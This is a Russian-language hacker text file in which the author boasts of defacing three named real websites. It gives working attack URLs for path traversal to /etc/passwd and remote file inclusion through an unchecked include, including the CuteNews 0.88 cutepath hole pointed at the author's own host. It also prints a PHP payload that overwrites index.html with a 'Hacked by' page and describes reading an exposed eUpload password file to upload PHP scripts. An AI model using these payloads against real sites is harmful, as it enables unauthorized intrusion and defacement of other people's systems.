############################################
#!/usr/share/doc/defaced/1/tandp/sitedef.txt
############################################
Уязвимости на сайтах (примеры дефейсов) [ by Волков Сергей aka forSer ]
Дефейс проходящий через уязвимости найденные на сайте является одним из наиболее
распрастранненых методов взлома сайтов. И он является результатом не крутости
каких либо лиц, называющих себя хакерами, а лоханутости админов :0) которые не
хотят (лень), не могут закрыть или просто незамечают дырки в своих “детищах”.
Пример 1: www.sgsha.stavropol.ru
Заметка: на сайте в данный момент сменен дизайн и данного бага уже не существует.
Сайт имели: Волков Сергей (forSer) & Москалев Андрей (MO$CAL)
Суть:
При заходе на сайт любой мог увидеть такую строчку:
http://www.sgsha.stavropol.ru/index1.php?path=akad.php
Ну вот, и у Вас, я думаю, уже есть мысли. Пробуем заменить:
http://www.sgsha.stavropol.ru/index1.php?path=../../../../../etc/passwd
В результате выполнения данной строчки у меня на экране появилось содержание
файла passwd. Конечно паролей там не оказалось.
Теперь пробуем другую вещь:
http://www.sgsha.stavropol.ru/index1.php?path=http://www.forser.by.ru/view.php
Вооооо… скрипт выполнен так как-будто он находится на этом же сайте.
Т.е. пишем любой скрипт php и дефейсим сайтик.
Для примера, простенький скрипт для просмотра содержимого каталога (view.php):
<?php
$handle=opendir(‘.’);
echo “Files: ”;
while (($file=readdir($handle))!==False) {
echo “$file “; }
closedir($handle);
?>
Т.к. мы имели полный доступ к сайту мы посмотрели исходник index1.php и
выяснилось, что уязвимость существует из-за следующей строчки:
include(“$path”);
Значение $path не проверяется, поэтому можно подключать файлы с других
сайтов.
На вашем сайте также не советую использовать неизвестные скрипты, которые имеют
массовое распространение, т.к. именно через них †ламеры† и могут взломать ваш
сайт.
Пример 2: www.erichmuehle.de
Заметка: …сайт висел дефейснутым где-то 9 дней :0) я уж успел перед всеми
друзьями похвастаться … хе, хотя этот сайт мог взломать любой чувак без особых
напрягов.
Сайт имел: forSer
Суть:
дефейснуть сайт мне позволила уже всем известная уязвимость в
CuteNews v0.88 shownews.php:
if (!$cutepath) $cutepath=”.”;
require_once(“$cutepath/config.php”);
{……}
$all_news=file(“$cutepath/news.txt”);
Реализация:
(http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER])
А вот наша реализация:
http://www.erichmuehle.de/artikel/shownews.php?cutepath=http://www.forser.by.ru
предварительно на http://www.forser.by.ru я закинул файл config.php следующего
содержания:
<?php
$context="<HTML><BODY BGCOLOR=#000000 text=#ffffff link=#ffffff>
<DIV align=center><TABLE width=750 border=0><TBODY><TR><TD align=center>
<h3>Hacked by <a href=mailto:[email protected]>forSer</a> 21/03/2003</h3></TD></TR>
</TBODY></TABLE></DIV>
</BODY></HTML>";
$fp=fopen("../index.html","w");
flock($fp, 2);
fwrite($fp,$context);
flock($fp, 3);
fclose($fp);
?>
Все о***нно, сайт дефеснут …жду, когда за мной приедут J
Пример 3: www.kottedg.far.ru
сайт был дефейснут благодаря недочету в eUpload (можно прочитать пароли и путь
для закачки в password.txt).
http://www.kottedg.far.ru/cgi-bin/upload/password.txt
Результат:
Kottedg nafig guest upl/
http://www.kottedg.far.ru/cgi-bin/upload/upload.html
закачиваю свои ПхП файлы и вперед.